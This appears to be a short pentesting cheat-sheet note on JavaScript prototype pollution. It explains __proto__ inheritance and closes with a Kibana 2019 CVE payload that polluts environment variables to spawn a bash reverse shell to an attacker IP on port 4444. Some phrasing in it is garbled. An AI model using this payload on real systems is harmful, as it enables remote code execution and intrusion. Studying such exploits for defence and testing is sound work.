# Prototype Pollution

Overwrite built in properties, like constructor, toString of an object.

Any other instance inherits properties from `Object.__proto__`. toString() is
inherited by all objects.
That means if the `toString()` functions is overwritten it is changed in all
other objects as well.

## Usage

Access to prototype can be gained inside an object, as an example

```javascript
obj.__proto__
Object.prototype
```

Create an object

```javascript
let obj = {}
```

Create properties inside `__proto__`.

```javascript
obj.__proto__.isAdmin = true
```

### Kibana CVE 2019

A concrete example is a Kibana prototype pollution from CVE from 2019. Write
reverse bash into variables so they get
Therefore Use the following node functions

* `require`
* `eval`

```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```